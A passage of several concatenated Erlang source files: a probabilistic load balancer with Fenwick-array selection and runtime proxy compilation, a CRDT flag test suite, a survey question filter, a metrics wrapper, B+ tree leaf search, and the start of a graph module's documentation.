handle_call(token, _From, #lambda_plb_state{capacity = Cap, index_to_pid = Itp} = State) ->
    Idx = take(rand:uniform(Cap) - 1, tuple_size(Itp)),
    To = element(Idx + 1, Itp),
    %% handing out the last token: block the queue so new waiters park
    Cap =:= 1 andalso begin State#lambda_plb_state.queue ! block end,
    % ?LOG_DEBUG("~p: giving token ~p", [_From, To], #{domain => [lambda]}),
    {reply, To, State#lambda_plb_state{capacity = Cap - 1}};
%% meta not yet received: park the caller, reply later from handle_info.
handle_call(meta, From, #lambda_plb_state{meta = Waiting} = State) when is_list(Waiting) ->
    %% Do not add any code that can block here
    {noreply, State#lambda_plb_state{meta = [From | Waiting]}};
handle_call(meta, _From, #lambda_plb_state{meta = Meta} = State) ->
    {reply, Meta, State};
handle_call(capacity, _From, #lambda_plb_state{capacity = Cap} = State) ->
    {reply, Cap, State}.

%% No casts are part of the protocol: any cast is a programming error.
handle_cast(_Cast, _State) ->
    error(badarg).
%% Handles demand from the server.
%% If it's the first time demand, start monitoring this server.
handle_info({demand, Demand, Server}, #lambda_plb_state{pid_to_index = Pti, index_to_pid = Itp,
    capacity = Cap} = State) ->
    %% current size of the Fenwick array / index_to_pid tuple
    ServerCount = tuple_size(Itp),
    %%
    ?LOG_DEBUG("received demand (~b) from ~p", [Demand, Server], #{domain => [lambda]}),
    %% unblock the queue
    Cap =:= 0 andalso begin State#lambda_plb_state.queue ! unblock end,
    %%
    case maps:find(Server, Pti) of
        {ok, {Index, _OldDemand}} ->
            %% known server: just add the new demand to its weight
            %% TODO: when old and new demands are different, start capacity search
            inc(Index, Demand, ServerCount),
            {noreply, State#lambda_plb_state{capacity = Cap + Demand}};
        error ->
            %% new server: monitor it so its weight is removed on 'DOWN'
            erlang:monitor(process, Server),
            case State#lambda_plb_state.free of
                [Free] ->
                    %% reached maximum size: double the array size
                    Extend = ServerCount * 2,
                    %% create a list of new free cells
                    NewFree = lists:seq(ServerCount, Extend - 1),
                    %% Weights:  1  2 3  4
                    %% Arr    :  1  3 3 10
                    %% Doubled:  1  3 3 10 0 0 0 10
                    [put(Seq, 0) || Seq <- NewFree],
                    %% new root slot carries the total of the old array
                    put(Extend - 1, get(ServerCount - 1)),
                    %% double the size of index_to_pid tuple
                    NewItp = list_to_tuple(tuple_to_list(setelement(Free + 1, Itp, Server)) ++ NewFree),
                    %% Now simply update new index in the double size array
                    inc(Free, Demand, Extend),
                    {noreply, State#lambda_plb_state{free = NewFree,
                        index_to_pid = NewItp,
                        pid_to_index = Pti#{Server => {Free, Demand}}, capacity = Cap + Demand}};
                [Free | More] ->
                    %% reuse a free slot, no resize needed
                    inc(Free, Demand, ServerCount),
                    {noreply, State#lambda_plb_state{free = More,
                        index_to_pid = setelement(Free + 1, Itp, Server),
                        pid_to_index = Pti#{Server => {Free, Demand}}, capacity = Cap + Demand}}
            end
    end;
%% First completed order while callers still wait for meta: compile the
%% proxy module, reply to all waiters, then fall through to the generic
%% complete_order clause with meta replaced by the module meta map.
handle_info({complete_order, [{_, _, Meta} | _] = Servers}, #lambda_plb_state{module = Module, meta = Waiting} = State) when is_list(Waiting) ->
    ?LOG_DEBUG("meta ~200p received for ~200p", [Meta, Waiting], #{domain => [lambda]}),
    %% start trapping exits just before compiling proxy, to ensure terminate/2 is
    %%  called when PLB shuts down
    process_flag(trap_exit, true),
    Module = compile_proxy(Module, Meta),
    [gen:reply(To, Meta) || To <- Waiting],
    handle_info({complete_order, Servers}, State#lambda_plb_state{meta = maps:get(module, Meta)});
handle_info({complete_order, Servers}, #lambda_plb_state{} = State) ->
    %% broker sent an update to us, order was (partially?) fulfilled, connect to provided servers
    ?LOG_DEBUG("found servers: ~200p", [Servers], #{domain => [lambda]}),
    Self = self(),
    [erlang:send(Pid, {connect, Self, Cap}, [nosuspend]) || {Pid, Cap, _Meta} <- Servers],
    {noreply, State};
%% server process died: return its slot to the free list and subtract its
%% remaining weight from the total capacity.
%% NOTE(review): the broker is monitored too (init/1); a broker 'DOWN'
%% would crash here on maps:take/2 - confirm that is intended.
handle_info({'DOWN', _MRef, process, Pid, _Reason}, #lambda_plb_state{pid_to_index = Pti, free = Free, capacity = Cap} = State) ->
    %% server process died
    {{Index, _SrvCap}, NewPti} = maps:take(Pid, Pti),
    Removed = read(Index),
    inc(Index, -Removed, tuple_size(State#lambda_plb_state.index_to_pid)),
    %% block the queue if no capacity left
    Cap =:= Removed andalso begin State#lambda_plb_state.queue ! block end,
    %% setelement(Index, State#lambda_state.index_to_pid, undefined), %% not necessary, helps debugging
    {noreply, State#lambda_plb_state{free = [Index | Free], capacity = Cap - Removed, pid_to_index = NewPti}}.
%% @doc gen_server termination callback. When a proxy module was compiled
%% (meta holds a map containing 'exports'), unload its code; otherwise
%% there is nothing to clean up.
terminate(Reason, #lambda_plb_state{module = Module, meta = #{exports := _}}) ->
    %% purge/delete results are only logged: the process is shutting down
    %% anyway, so failures here are not actionable
    WasPurged = code:purge(Module),
    WasDeleted = code:delete(Module),
    ?LOG_DEBUG("~s purge/delete (~p/~p), reason ~200p",
        [Module, WasPurged, WasDeleted, Reason], #{domain => [lambda]}),
    ok;
terminate(_Reason, _State) ->
    ok.
%%--------------------------------------------------------------------
%% Internal implementation
%% Blocking queue: processes are waiting until capacity is available.
%% While blocked, '$gen_call' wait requests simply accumulate in the
%% mailbox (selective receive) and are answered after 'unblock'.
queue() ->
    receive
        unblock ->
            % ?LOG_DEBUG("Queue unblocked", [], #{domain => [lambda]}),
            queue_open()
    end.

%% Open state: reply 'ok' to every parked waiter until 'block' arrives.
queue_open() ->
    receive
        {'$gen_call', From, wait} ->
            % ?LOG_DEBUG("Wait done for ~p", [From], #{domain => [lambda]}),
            gen:reply(From, ok),
            queue_open();
        block ->
            % ?LOG_DEBUG("Queue blocked", [], #{domain => [lambda]}),
            queue()
    end.
%% Implementation specifics:
%%  * unspecified value is returned for lower_bound when array is empty
%%  * undefined is returned for select when value is beyond max allowed
%% @doc Selects pid, and reduces weight of the pid
%%      by 1. Works in O(logN). The Heart of probabilistic
%%      load balancer.
%% Bound is a 0-based cumulative weight, Max is the array size
%% (a power of two). take_bound/3 decrements partial sums along the
%% descent; the root slot (Max - 1, holding the total) is adjusted here.
-spec take(non_neg_integer(), non_neg_integer()) -> term().
take(Bound, Max) ->
    Idx = take_bound(Bound, 0, Max bsr 1),
    Last = Max - 1,
    put(Last, get(Last) - 1),
    Idx.
%% -------------------------------------------------------------------
%% Internal implementation details - Ryabko array primitives
%% @doc Returns value for a specific index of the array.
%%      Works in O(logN) time.
%% Recovers the individual weight at Idx by subtracting the partial sums
%% of sibling ranges (walking set bits of Idx from the least significant).
read(Idx) ->
    Val = get(Idx),
    read1(Idx, Val, 1).

read1(Idx, Val, Mask) when Idx band Mask =/= 0 ->
    %% Idx bxor Mask addresses the left sibling range covered by this bit
    read1(Idx, Val - get(Idx bxor Mask), Mask bsl 1);
read1(_Idx, Val, _Mask) ->
    Val.
%% @doc Updates weight at the specified index of the Fenwick (Ryabko)
%% array kept in the process dictionary, adding Value (resulting weight
%% must not be negative). Max is the array size; valid indices are
%% 0..Max-1. Works in O(logN) time.
%% The guard uses the strict bound 'Idx < Max' (was '=< Max'):
%% Idx =:= Max is already out of range and would read an undefined
%% dictionary slot (badarith). For the power-of-two sizes used in this
%% module the traversal never yields Idx =:= Max, so behaviour is
%% unchanged; the strict bound makes the invariant explicit and safe
%% for any size.
inc(Idx, Value, Max) when Idx < Max ->
    put(Idx, get(Idx) + Value),
    %% next Fenwick node: set the lowest clear bit of Idx
    inc(Idx bor (Idx + 1), Value, Max);
inc(_Idx, _Value, _Max) ->
    ok.
%% @doc Returns index in the array which has cumulative
%%      frequency equal or greater than requested, and
%%      reduces weight of this index by one.
%%      Works in O(logN) time.
%% Binary descent over the implicit Fenwick tree: Mask halves each step;
%% partial sums on the taken left branches are decremented in place so
%% the structure stays consistent after the -1 applied by take/2.
take_bound(_Bound, Idx, 0) ->
    Idx;
take_bound(Bound, Idx, Mask) ->
    %% Mid holds the partial sum of the left half of the current range
    Mid = Idx + Mask - 1,
    Partial = get(Mid),
    case Bound - Partial of
        Left when Left < 0 ->
            %% target lies in the left half; account for the upcoming -1
            put(Mid, Partial - 1),
            take_bound(Bound, Idx, Mask bsr 1);
        Right ->
            %% target lies in the right half; search with reduced bound
            take_bound(Right, Idx + Mask, Mask bsr 1)
    end.
%% @private creates proxy, dynamically, when meta has been received for the first time.
%% Generates one delegating function per exported {F, A}, compiles the
%% source text and loads the resulting module under the original name.
compile_proxy(Module, Meta) ->
    #{module := #{exports := Exports}} = Meta,
    %% create a module (technically possible to make an AST, but for compatibility
    %%  reasons it's better to use text lines for compilation)
    ExpLine = "-export([" ++ lists:flatten(lists:join(", ", [io_lib:format("~s/~b", [F, A]) || {F, A} <- Exports])) ++ "]).",
    %% functions listed under 'cast' delegate to lambda_plb:cast instead of call
    Cast = maps:get(cast, Meta, []),
    Impl = [proxy(Module, F, A, Cast) || {F, A} <- Exports],
    Lines = ["-module(" ++ atom_to_list(Module) ++ ").", ExpLine] ++ Impl,
    %% compile resulting proxy file: one form (line) at a time
    Tokens = [begin {ok, T, _} = erl_scan:string(L), T end || L <- Lines],
    Forms = [begin {ok, F} = erl_parse:parse_form(T), F end || T <- Tokens],
    {ok, Module, Binary} = compile:forms(Forms),
    {module, Module} = code:load_binary(Module, "lambda", Binary),
    Module.
%% @private Renders the source text of a single proxy function clause:
%% F(Arg1, ..., ArgN) delegates to lambda_plb:call/4 (or cast/4 when F
%% is listed in Cast). Returns a flat string ready for erl_scan.
%% (Also removes a trailing dataset artifact that made the line unparsable.)
proxy(M, F, Arity, Cast) ->
    Args = lists:join(", ", ["Arg" ++ integer_to_list(Seq) || Seq <- lists:seq(1, Arity)]),
    CastCall = case lists:member(F, Cast) of true -> cast; false -> call end,
    lists:flatten(io_lib:format("~s(~s) -> lambda_plb:~s(~s, ~s, [~s], infinity).", [F, Args, CastCall, M, F, Args])).
%% -------------------------------------------------------------------
%%
%% Copyright (c) 2016 <NAME>. All Rights Reserved.
%%
%% This file is provided to you under the Apache License,
%% Version 2.0 (the "License"); you may not use this file
%% except in compliance with the License. You may obtain
%% a copy of the License at
%%
%% http://www.apache.org/licenses/LICENSE-2.0
%%
%% Unless required by applicable law or agreed to in writing,
%% software distributed under the License is distributed on an
%% "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
%% KIND, either express or implied. See the License for the
%% specific language governing permissions and limitations
%% under the License.
%%
%% -------------------------------------------------------------------
%%
-module(state_type_semantics_SUITE).
-author("<NAME> <<EMAIL>>").
%% common_test callbacks
-export([init_per_suite/1,
end_per_suite/1,
init_per_testcase/2,
end_per_testcase/2,
all/0]).
%% tests
-compile([nowarn_export_all, export_all]).
-include("state_type.hrl").
-include_lib("common_test/include/ct.hrl").
-include_lib("eunit/include/eunit.hrl").
%% ===================================================================
%%  common_test callbacks
%% ===================================================================
%% No per-suite or per-testcase setup/teardown is needed: each callback
%% passes Config through unchanged.
init_per_suite(Config) -> Config.
end_per_suite(Config) -> Config.
init_per_testcase(_Case, Config) -> Config.
end_per_testcase(_Case, Config) -> Config.
%% Test cases executed by common_test.
all() ->
    [
        flag_test
    ].
%% ===================================================================
%%  tests
%% ===================================================================
%% Checks convergence semantics of both flag flavours: enable-wins
%% flags (state_ewflag) converge to true under concurrent conflicting
%% mutations, disable-wins flags (state_dwflag) converge to false.
flag_test(_Config) ->
    Cases = [{state_ewflag, true}, {state_dwflag, false}],
    lists:foreach(fun({Type, Expected}) -> check_flag(Type, Expected) end, Cases).

%% Runs the concurrent mutation scenario for one flag type and asserts
%% that both merge results agree on the expected converged value.
check_flag(FlagType, Expected) ->
    {MergedFromEnabled, MergedFromDisabled} = flag_mutate_concurrently(FlagType),
    ?assert(MergedFromEnabled == MergedFromDisabled),
    ?assertEqual(Expected, MergedFromEnabled).
%% ===================================================================
%%  Internal functions
%% ===================================================================
%% @private Exercises one flag type with concurrent conflicting mutations.
%% Starting from both an enabled and a disabled flag, actors A and B apply
%% concurrent enable/disable operations; after merging, both replicas must
%% converge to the same value regardless of the starting state.
%% Returns {QueryOfMergedEnabledStart, QueryOfMergedDisabledStart}.
%% (Fix: removed a trailing dataset artifact that broke the module syntax.)
flag_mutate_concurrently(FlagType) ->
    ActorA = "A",
    ActorB = "B",
    ActorC = "C",
    Flag0 = FlagType:new(),
    {ok, EFlag} = FlagType:mutate(enable, ActorC, Flag0),
    {ok, DFlag} = FlagType:mutate(disable, ActorC, Flag0),
    ?assertEqual(true, FlagType:query(EFlag)),
    ?assertEqual(false, FlagType:query(DFlag)),
    %% concurrent mutations in enabled flag
    {ok, EFlagA} = FlagType:mutate(enable, ActorA, EFlag),
    {ok, EFlagB} = FlagType:mutate(disable, ActorB, EFlag),
    ?assertEqual(true, FlagType:query(EFlagA)),
    ?assertEqual(false, FlagType:query(EFlagB)),
    %% merge them
    EFlagMerged = FlagType:merge(EFlagA, EFlagB),
    %% concurrent mutations in disabled flag
    {ok, DFlagA} = FlagType:mutate(enable, ActorA, DFlag),
    {ok, DFlagB} = FlagType:mutate(disable, ActorB, DFlag),
    ?assertEqual(true, FlagType:query(DFlagA)),
    ?assertEqual(false, FlagType:query(DFlagB)),
    %% merge them
    DFlagMerged = FlagType:merge(DFlagA, DFlagB),
    %% return query values
    {
        FlagType:query(EFlagMerged),
        FlagType:query(DFlagMerged)
    }.
%% @author <NAME> <<EMAIL>>
%% @copyright 2012 <NAME>
%% Copyright 2012 <NAME>
%%
%% Licensed under the Apache License, Version 2.0 (the "License");
%% you may not use this file except in compliance with the License.
%% You may obtain a copy of the License at
%%
%% http://www.apache.org/licenses/LICENSE-2.0
%%
%% Unless required by applicable law or agreed to in writing, software
%% distributed under the License is distributed on an "AS IS" BASIS,
%% WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
%% See the License for the specific language governing permissions and
%% limitations under the License.
-module(filter_survey_prepare_thurstone).
-export([
survey_prepare_thurstone/2,
survey_prepare_thurstone/3
]).
%% @doc Prepare a thurstone question block, taking the randomisation
%% setting from the block's own is_random property.
survey_prepare_thurstone(Blk, Context) ->
    survey_prepare_thurstone(Blk, undefined, Context).

%% @doc Prepare a thurstone question block. Passing 'undefined' as the
%% second argument defers the randomisation decision to the block's
%% is_random property (defaulting to false).
survey_prepare_thurstone(Blk, undefined, Context) ->
    IsRandom = proplists:get_value(is_random, Blk, false),
    survey_prepare_thurstone_1(Blk, IsRandom, Context);
survey_prepare_thurstone(Blk, IsRandom, Context) ->
    survey_prepare_thurstone_1(Blk, IsRandom, Context).
%% Builds the template variables for a thurstone block: resolves the
%% (possibly translated) answers text, splits it into option proplists,
%% optionally shuffles them, and adds the quiz/test flags.
survey_prepare_thurstone_1(Blk, IsRandom, Context) ->
    %% answers may be a translated text; pick the best language for Context
    Answers = z_trans:lookup_fallback(
        proplists:get_value(answers, Blk, <<>>),
        Context),
    Qs = maybe_randomize(
        z_convert:to_bool(IsRandom),
        split_markers(split_lines(Answers))),
    case z_convert:to_bool(proplists:get_value(is_test, Blk)) of
        true ->
            [
                {is_test, true},
                {is_test_direct, z_convert:to_bool(proplists:get_value(is_test_direct, Blk))},
                {answers, Qs}
            ];
        false ->
            [
                {is_test, false},
                {answers, Qs}
            ]
    end.

%% Shuffle the option list only when randomisation is requested.
maybe_randomize(false, List) -> List;
maybe_randomize(true, List) -> z_utils:randomize(List).

%% Split the answers text into one trimmed binary per line.
split_lines(Text) ->
    Options = binary:split(z_string:trim(Text), <<"\n">>, [global]),
    [ z_string:trim(Option) || Option <- Options ].
%% @doc Turn answer lines into option proplists, numbering options from 1.
%% Blank lines are skipped without consuming an option number.
split_markers(Qs) ->
    split_markers(Qs, 1, []).

split_markers([], _N, Acc) ->
    lists:reverse(Acc);
split_markers([<<>>|Qs], N, Acc) ->
    %% Fix: lines are binaries after split_lines/1, so blank lines arrive
    %% as <<>>; the previous '[]' (empty list) clause never matched them
    %% and blank lines leaked through as empty options.
    split_markers(Qs, N, Acc);
split_markers([[]|Qs], N, Acc) ->
    split_markers(Qs, N, Acc);
split_markers([Opt|Qs], N, Acc) ->
    split_markers(Qs, N+1, [split_marker(Opt, N)|Acc]).

%% A leading '*' marks the correct answer (used in test/quiz mode).
split_marker(<<$*,Line/binary>>, N) ->
    split_marker_1(true, z_string:trim(Line), N);
split_marker(Line, N) ->
    split_marker_1(false, Line, N).

%% Build the option proplist. When the line has no explicit
%% "value#option" pair, the 1-based option index N becomes the value.
split_marker_1(IsCorrect, Line, N) ->
    case split_kv(Line) of
        [Value,Option] ->
            [
                {value, Value},
                {option, Option},
                {is_correct, IsCorrect}
            ];
        [Option] ->
            [
                {value, z_convert:to_binary(N)},
                {option, Option},
                {is_correct, IsCorrect}
            ]
    end.

%% Split "value#option" on the first '#', keeping HTML character
%% references ("&#...;") intact.
split_kv(Line) ->
    split_kv(Line, <<>>).

split_kv(<<>>, Acc) -> [Acc];
split_kv(<<"&#", Rest/binary>>, Acc) -> split_kv(Rest, <<Acc/binary, "&#">>);
split_kv(<<"#", Rest/binary>>, Acc) -> [Acc,Rest];
split_kv(<<C/utf8, Rest/binary>>, Acc) -> split_kv(Rest, <<Acc/binary, C/utf8>>).
%%% -*- erlang -*-
%%%
%%% This file is part of metrics released under the BSD license.
%%% See the LICENSE for more information.
%%%
-module('metrics').
%% API exports
-export([init/1]).
-export([
new/3,
delete/2,
increment_counter/2,
increment_counter/3,
decrement_counter/2,
decrement_counter/3,
update_histogram/3,
update_gauge/3,
update_meter/3]).
%% Engine handle: wraps the backend callback module chosen in init/1.
-record(metrics_ng, {mod}).

-type metrics_engine() :: #metrics_ng{}.
-type metric() :: counter | histogram | gauge | meter.

%% Fix: the attribute is '-export_type' (singular). '-export_types' is
%% silently accepted as a user attribute, so the types were never
%% actually exported for use in remote specs.
-export_type([metrics_engine/0, metric/0]).
%%====================================================================
%% API functions
%%====================================================================

%% @doc Set the backend module to use for metrics.
%% Metric types are: counter, histogram, gauge, meter.
%%
%% Supported backend modules:
%% <ul>
%% <li>`metrics_folsom': to interface folsom</li>
%% <li>`metrics_exometer': to interface to exometer</li>
%% <li>`metrics_dummy': a dummy module to use by default.</li>
%% </ul>
%% Raises `badarg' when the module does not export `new/2'.
-spec init(Mod :: atom()) -> metrics_engine().
init(Mod) ->
    %% ensure the module is loaded before probing its exports
    _ = code:ensure_loaded(Mod),
    case erlang:function_exported(Mod, new, 2) of
        true -> #metrics_ng{mod = Mod};
        false -> error(badarg)
    end.
%% @doc Create a new metric of the given type; delegates to the backend.
-spec new(metrics_engine(), metric(), any()) -> ok | {error, term()}.
new(#metrics_ng{mod=Mod}, Type, Name) ->
    Mod:new(Type, Name).

%% @doc Delete a metric.
-spec delete(metrics_engine(), any()) -> ok.
delete(#metrics_ng{mod=Mod}, Name) ->
    Mod:delete(Name).

%% @doc Increment a counter by 1.
-spec increment_counter(metrics_engine(), any()) -> ok | {error, term()}.
increment_counter(#metrics_ng{mod=Mod}, Name) ->
    Mod:increment_counter(Name).

%% @doc Increment a counter by Value.
-spec increment_counter(metrics_engine(), any(), pos_integer()) -> ok | {error, term()}.
increment_counter(#metrics_ng{mod=Mod}, Name, Value) ->
    Mod:increment_counter(Name, Value).

%% @doc Decrement a counter by 1.
-spec decrement_counter(metrics_engine(), any()) -> ok | {error, term()}.
decrement_counter(#metrics_ng{mod=Mod}, Name) ->
    Mod:decrement_counter(Name).

%% @doc Decrement a counter by Value.
-spec decrement_counter(metrics_engine(), any(), pos_integer()) -> ok | {error, term()}.
decrement_counter(#metrics_ng{mod=Mod}, Name, Value) ->
    Mod:decrement_counter(Name, Value).

%% @doc Update an histogram with a value or the duration of a function. When
%% passing a function the result will be returned once the metric has been
%% updated with the duration.
-spec update_histogram
    (metrics_engine(), any(), number()) -> ok | {error, term()};
    (metrics_engine(), any(), function()) -> ok | {error, term()}.
update_histogram(#metrics_ng{mod=Mod}, Name, ValueOrFun) ->
    Mod:update_histogram(Name, ValueOrFun).

%% @doc Update a gauge with a value.
-spec update_gauge(metrics_engine(), any(), number()) -> ok | {error, term()}.
update_gauge(#metrics_ng{mod=Mod}, Name, Value) ->
    Mod:update_gauge(Name, Value).

%% @doc Update a meter with a value.
-spec update_meter(metrics_engine(), any(), number()) -> ok | {error, term()}.
update_meter(#metrics_ng{mod=Mod}, Name, Value) ->
    Mod:update_meter(Name, Value).
%%%-------------------------------------------------------------------
%%% @author <NAME>
%%% @copyright (C) 2017: <NAME>
%%% This software is released under the MIT license cited in 'LICENSE.md'.
%%% @end
%%%-------------------------------------------------------------------
%%% @doc
%%% This module provides search functionality for leaf nodes of B+ tree.
%%% @end
%%%-------------------------------------------------------------------
-module(bp_tree_leaf).
-author("<NAME>").
-include("bp_tree.hrl").
%% API exports
-export([find_offset/2, find_next/2, lower_bound/2, lower_bound_node/2]).
-export([find_leftmost/1]).
-type find_pos_result() :: {{ok, pos_integer(), bp_tree:tree_node()} |
{error, term()}, bp_tree:tree()}.
-type find_node_result() :: {{ok, bp_tree_node:id(), bp_tree:tree_node()} |
{error, term()}, bp_tree:tree()}.
%%====================================================================
%% API functions
%%====================================================================

%%--------------------------------------------------------------------
%% @doc
%% Returns the leaf containing a key that follows the provided key,
%% together with the position of the next key inside that leaf.
%% @end
%%--------------------------------------------------------------------
-spec find_next(bp_tree:key(), bp_tree:tree()) -> find_pos_result().
find_next(Key, Tree) ->
    with_root(fun(RootId, Tree2) ->
        find_next(Key, RootId, Tree2, [])
    end, Tree).

%%--------------------------------------------------------------------
%% @doc
%% Returns the leaf whose keys start at the provided offset, together
%% with the position of the first such key inside it.
%% @end
%%--------------------------------------------------------------------
-spec find_offset(non_neg_integer(), bp_tree:tree()) -> find_pos_result().
find_offset(Offset, Tree) ->
    case find_leftmost(Tree) of
        {{ok, _NodeId, Node}, Tree2} ->
            find_offset(Offset, Node, Tree2);
        {{error, _} = Error, Tree2} ->
            {Error, Tree2}
    end.

%%--------------------------------------------------------------------
%% @doc
%% Returns the leaf containing the first key greater or equal to the
%% provided key, together with the position of that key in the node.
%% @end
%%--------------------------------------------------------------------
-spec lower_bound(bp_tree:key(), bp_tree:tree()) -> find_pos_result().
lower_bound(Key, Tree) ->
    with_root(fun(RootId, Tree2) ->
        lower_bound(Key, RootId, Tree2)
    end, Tree).

%%--------------------------------------------------------------------
%% @doc
%% Returns the leaf containing the first key greater or equal to the
%% provided key.
%% @end
%%--------------------------------------------------------------------
-spec lower_bound_node(bp_tree:key(), bp_tree:tree()) ->
    {{ok, bp_tree:tree_node()} | {error, term()}, bp_tree:tree()}.
lower_bound_node(Key, Tree) ->
    with_root(fun(RootId, Tree2) ->
        lower_bound_node(Key, RootId, Tree2)
    end, Tree).

%%--------------------------------------------------------------------
%% @doc
%% Returns the leftmost leaf in a B+ tree.
%% @end
%%--------------------------------------------------------------------
-spec find_leftmost(bp_tree:tree()) -> find_node_result().
find_leftmost(Tree) ->
    with_root(fun find_leftmost/2, Tree).

%% @private Fetches the root node id from the store and applies
%% Fun(RootId, Tree2); store errors are propagated unchanged. This is the
%% common prologue of every exported function above.
with_root(Fun, Tree) ->
    case bp_tree_store:get_root_id(Tree) of
        {{ok, RootId}, Tree2} -> Fun(RootId, Tree2);
        {{error, Reason}, Tree2} -> {{error, Reason}, Tree2}
    end.
%%====================================================================
%% Internal functions
%%====================================================================

%%--------------------------------------------------------------------
%% @private
%% @doc
%% Returns node and position of next key in B+ tree. Builds a path of right
%% siblings of nodes along the path from a root node to a leaf associated
%% with a key. The sibling path is later used to continue the scan when
%% the key is the last one in its leaf.
%% @end
%%--------------------------------------------------------------------
-spec find_next(bp_tree:key(), bp_tree_node:id(), bp_tree:tree(),
    [bp_tree_node:id()]) -> find_pos_result().
find_next(Key, NodeId, Tree, Path) ->
    {{ok, Node}, Tree2} = bp_tree_store:get_node(NodeId, Tree),
    case bp_tree_node:child_with_right_sibling(Key, Node) of
        {ok, NodeId2, RNodeId} ->
            find_next(Key, NodeId2, Tree2, [RNodeId | Path]);
        {error, not_found} ->
            %% NOTE(review): passes the pre-get_node 'Tree' instead of
            %% 'Tree2' - confirm the store state threading is intentional.
            find_next_in_leaf(Key, Node, Tree, Path)
    end.

%%--------------------------------------------------------------------
%% @private
%% @doc
%% Returns node and position of next key in B+ tree leaf: the key right
%% after an exact match, or the lower bound itself when Key is absent;
%% falls back to the sibling path when the leaf is exhausted.
%% @end
%%--------------------------------------------------------------------
-spec find_next_in_leaf(bp_tree:key(), bp_tree:tree_node(), bp_tree:tree(),
    [bp_tree_node:id()]) -> find_pos_result().
find_next_in_leaf(Key, Node, Tree, Path) ->
    Pos = bp_tree_node:lower_bound(Key, Node),
    % TODO - change
    case bp_tree_node:key(Pos, Node) of
        {ok, Key} ->
            %% exact match: the next key is at the following position
            case bp_tree_node:value(Pos + 1, Node) of
                {ok, _} ->
                    {{ok, Pos + 1, Node}, Tree};
                {error, out_of_range} ->
                    find_next_using_path(Tree, Path)
            end;
        {ok, _} ->
            %% Key absent: the lower bound already is the next key
            {{ok, Pos, Node}, Tree};
        {error, out_of_range} ->
            find_next_using_path(Tree, Path)
    end.
%%--------------------------------------------------------------------
%% @private
%% @doc
%% Helper function to find_next_in_leaf/4 used when next key
%% has not been found in checked node (out_of_range error has appeared).
%% Descends into the leftmost leaf of the nearest non-nil right sibling
%% collected on the way down; returns not_found when no sibling exists.
%% @end
%%--------------------------------------------------------------------
-spec find_next_using_path(bp_tree:tree(), [bp_tree_node:id()]) -> find_pos_result().
find_next_using_path(Tree, Path) ->
    %% drop levels where there was no right sibling (?NIL markers)
    Path2 = lists:dropwhile(fun(SNodeId) -> SNodeId == ?NIL end, Path),
    case Path2 of
        [] ->
            {{error, not_found}, Tree};
        [SNodeId | _] ->
            case find_leftmost(SNodeId, Tree) of
                {{ok, _, NextNode}, Tree2} ->
                    %% first key of the next leaf is the successor
                    {{ok, 1, NextNode}, Tree2};
                {{error, Reason}, Tree2} ->
                    {{error, Reason}, Tree2}
            end
    end.

%%--------------------------------------------------------------------
%% @private
%% @doc
%% Returns key at given offset starting from a node. Along with the key
%% a node holding it and its position within this node is returned.
%% Walks right siblings, subtracting each leaf's size from the offset.
%% @end
%%--------------------------------------------------------------------
-spec find_offset(non_neg_integer(), bp_tree:tree_node(), bp_tree:tree()) ->
    find_pos_result().
find_offset(Offset, Node, Tree) ->
    Size = bp_tree_node:size(Node),
    case Size =< Offset of
        true ->
            %% offset lies beyond this leaf: continue in the right sibling
            case bp_tree_node:right_sibling(Node) of
                {ok, NodeId2} ->
                    {{ok, Node2}, Tree2} = bp_tree_store:get_node(NodeId2, Tree),
                    find_offset(Offset - Size, Node2, Tree2);
                {error, Reason} ->
                    {{error, Reason}, Tree}
            end;
        false ->
            %% positions are 1-based inside a node
            {{ok, Offset + 1, Node}, Tree}
    end.
%%--------------------------------------------------------------------
%% @private
%% @doc
%% Returns leaf of a B+ tree, rooted in a node identified by ID, that contains
%% first key that is greater or equal to provided key. Along with the node
%% the position of the key is provided.
%% @end
%%--------------------------------------------------------------------
-spec lower_bound(bp_tree:key(), bp_tree_node:id(), bp_tree:tree()) ->
    find_pos_result().
lower_bound(Key, NodeId, Tree) ->
    %% bp_tree_path:find/3 returns the root-to-leaf path; head is the leaf
    {[{_, Node} | _], Tree2} = bp_tree_path:find(Key, NodeId, Tree),
    Pos = bp_tree_node:lower_bound(Key, Node),
    case bp_tree_node:value(Pos, Node) of
        {ok, _} -> {{ok, Pos, Node}, Tree2};
        {error, out_of_range} -> {{error, not_found}, Tree2}
    end.

%%--------------------------------------------------------------------
%% @private
%% @doc
%% Returns leaf of a B+ tree, rooted in a node identified by ID, that contains
%% first key that is greater or equal to provided key.
%% @end
%%--------------------------------------------------------------------
-spec lower_bound_node(bp_tree:key(), bp_tree_node:id(), bp_tree:tree()) ->
    {{ok, bp_tree:tree_node()}, bp_tree:tree()}.
lower_bound_node(Key, NodeId, Tree) ->
    {[{_, Node} | _], Tree2} = bp_tree_path:find(Key, NodeId, Tree),
    {{ok, Node}, Tree2}.

%%--------------------------------------------------------------------
%% @private
%% @doc
%% Returns leftmost leaf in a B+ tree rooted in a node: follows the
%% leftmost child pointers until a leaf (no children) is reached.
%% (Fix: removed a trailing dataset artifact that broke the module syntax.)
%% @end
%%--------------------------------------------------------------------
-spec find_leftmost(bp_tree_node:id(), bp_tree:tree()) -> find_node_result().
find_leftmost(NodeId, Tree) ->
    case bp_tree_store:get_node(NodeId, Tree) of
        {{ok, Node}, Tree2} ->
            case bp_tree_node:leftmost_child(Node) of
                {ok, NodeId2} -> find_leftmost(NodeId2, Tree2);
                {error, not_found} -> {{ok, NodeId, Node}, Tree2}
            end;
        {{error, Reason}, Tree2} ->
            {{error, Reason}, Tree2}
    end.
%% @doc Directed / Undirected Graphs
%%
%% <p>This module implements directed and undirected graphs that are either
%% weighted with numeric weights or unweighted.</p>
%%
%% <p>It is basically syntactic sugar for the digraph module with added
%% support for undirected graphs.</p>
%%
%% <h3>How to use</h3>
%% <p>The fastest way to create a graph is to load it from a file with <code>from_file/1</code>.
%% The file that contains the graph must have the following format.</p>
%%
%% <ul>
%% <li>The 1st line will consist of four terms separated by white space.
%% <ul>
%% <li>1st Term: Positive Integer N that denotes the number of vertices</li>
%% <li>2nd Term: Positive Integer M that denotes the number of edges.</li>
%% <li>3rd Term: Atom <code>directed</code> or <code>undirected</code> that denotes the type of the graph.</li>
%% <li>4th Term: Atom <code>unweighted</code> or <code>d</code> or <code>f</code> that denotes the type of the edge weights.
%% <ul>
%% <li><code>unweighted</code> is for an unweighted graph.</li>
%% <li><code>d</code> is for decimal integer weights.</li>
